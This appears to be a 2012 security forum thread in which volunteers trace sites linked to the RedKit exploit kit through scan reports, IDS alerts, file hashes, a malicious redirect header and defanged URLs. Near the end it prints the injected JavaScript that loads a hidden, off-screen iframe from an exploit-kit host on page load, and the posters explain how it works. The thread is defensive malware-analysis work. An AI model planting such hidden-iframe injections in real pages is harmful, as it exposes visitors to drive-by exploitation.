See: http://urlquery.net/report.php?id=94878
Detected possible RedKit exploit kit HTTP GET request
IDS alert for FILEMAGIC Macromedia Flash data (compressed),
This found suspiucious: s.click.taobao dot com/9?p=31919830_0_0&u=index&l=htXp:/www.tmall.com/ benign
[nothing detected] (iframe) s.click.taobao dot com/9?p=31919830_0_0&u=index&l=htXp:/www.tmall.com/
status: (referer=static.xyincom.netdna-cdn dot com/)saved 2267 bytes 7f8979709884d846a95f7325445730a8f91e79d1
info: [img] img.tongji.linezing dot com/1023331/tongji.gif
info: [decodingLevel=0] found JavaScript
suspicious
PUP detected by avast: https://www.virustotal.com/file/9b7b84be9c515601d0daf1f924dde3141ae0a2849a315d0592ea48cee9a4b91e/analysis/

reported to virus AT avast dot com

polonus

Hi Polonus,

I researched the taobao site with my own hands here:
http://pastebin.com/d0TCytwK

~!Donovan

Interesting !Donovan,

adclicking trackware… also consider this:
[nothing detected] (script) a.tbcdn dot cn/p/p4p/hot-item-min.js?t=20110307
status: (referer=s.click.taobao dot com/)saved 1699 bytes d883749c14ae7ad48bec403b4f57474ced962bf9
info: [img] a.tbcdn dot cn/p/p4p/
info: [decodingLevel=0] found JavaScript
error: undefined variable TB
error: undefined function TB.namespace
suspicious:

a.alimama dot cn/i.js benign
[nothing detected] (script) a.alimama dot cn/i.js
status: (referer=a.alimama dot cn/inf.js)saved 14906 bytes 0b781b9ca29798ada82922f17906c4cb53f02a05
info: [script] a.alimama dot cn/
info: [decodingLevel=0] found JavaScript
suspicious: Trojan.Win32.Iyeclore - Detected URL is associated with malware in swf file,
see: http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-STI/detailed-analysis.aspx

polonus

Redkit exploit sites can be detected as goog-malware-shavar: http://www.cknow.com/cms/articles/what-is-goog-malware-shavar.html (articled written by DaBoss)
and site is then being blacklisted- example: http://urlquery.net/report.php?id=97496
Web application details:
Plesk version 7 outdated: Upgrade required.
Running Plesk 7: resistenza dot it:8443 See: http://sitecheck.sucuri.net/results/resistenza.it/37263467.html
But trying to load htxp://www.google.nl/search?hl=nl&output=search&sclient=psy-ab&q=http%3A%2F%2Fresistenza.it%2F37263467.html&btnK=
avast Webshield alerts for JS:ScriptPE-inf[Trj]
Had I gone there, there would have been a conditional redirect: Header returned by request for: htxp://resistenza.it/37263467.html

HTTP/1.1 301 Moved Permanently
Date: Fri, 20 Jul 2012 14:24:07 GMT
Server: Apache
Location: htxp://bronzesage.ru/in.cgi?16 → http://urlquery.net/report.php?id=97788 Detected SutraTDS HTTP GET request
ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi

The location line in the header above has redirected the request to: htxp://bronzesage.ru/in.cgi?16
see: http://www.google.com/safebrowsing/diagnostic?site=http%3A//bronzesage.ru/in.cgi%3F16

polonus

What on this site? A redkit exploit site with 65 IDS alerts?
http://urlquery.net/report.php?id=98250
see: http://labs.sucuri.net/?details=www.senkconsultancy.nl
URL blacklisted by Google Safe Browsing: goog-malware-shavar
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.senkconsultancy.nl%2F&client=googlechrome&hl=nl
7 trojans
continuous pattern in code: //eval j%3 //eval j%3 //eval j%3 CreateElement iframe
Just 1 detection here: http://vscan.urlvoid.com/analysis/3558e1cfa39e1d3cadeef6d4534471fc/aW5kZXg=/ (Ikarus → Trojan.Script

polonus

Hi Polonus,

See: http://urlquery.net/report.php?id=98319
And: http://urlquery.net/report.php?id=98324

Trying to access it directly we get a 404. I’m assuming this is related with the evals. There could be some server-side action behind-the-scenes.

Also: hXtp://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html

Hi !Donovan,

And browser specific code. This comes after the < /html> tag and can be considered as suspicious
8: < !-- a padding to disable MSIE and Chrome friendly error page →
9: < !-- a padding to disable MSIE and Chrome friendly error page →
10: < !-- a padding to disable MSIE and Chrome friendly error page →
11: < !-- a padding to disable MSIE and Chrome friendly error page →
12: < !-- a padding to disable MSIE and Chrome friendly error page →
13: < !-- a padding to disable MSIE and Chrome friendly error page →

polonus

VirusTotal
https://www.virustotal.com/file/051df1d6cfe3bca835db59e444a70b5868241f98b93aa57d95ba35fb2b3cf03a/analysis/1342818410/

First seen by VirusTotal
2012-07-20 21:06:50 UTC ( 3 minutter ago )

Yes, Pondus,

999em is being used for some text hiding or off-screen positioning, like in : ^=f

 ^unction frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "htxp://figuurverhuur.nl/main.php"; -
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd; 

iframe source → > http://urlquery.net/report.php?id=98319 (Detected possible RedKit exploit kit HTTP GET request)

!Donovan might give us additional info on how this is working and why they (ab)use -999em here,

polonus

sucuri
http://sitecheck.sucuri.net/results/figuurverhuur.nl

Hi Polonus & Pondus,

See: http://www.w3schools.com/cssref/css_units.asp
And: http://www.w3schools.com/Css/css_positioning.asp

Using -XXem on the css positioning elements is used to hide the text given from the iframe on the current page despite the font size, due to its em measurement.

So -999em for top and left would completely hide the results in an unseen corner.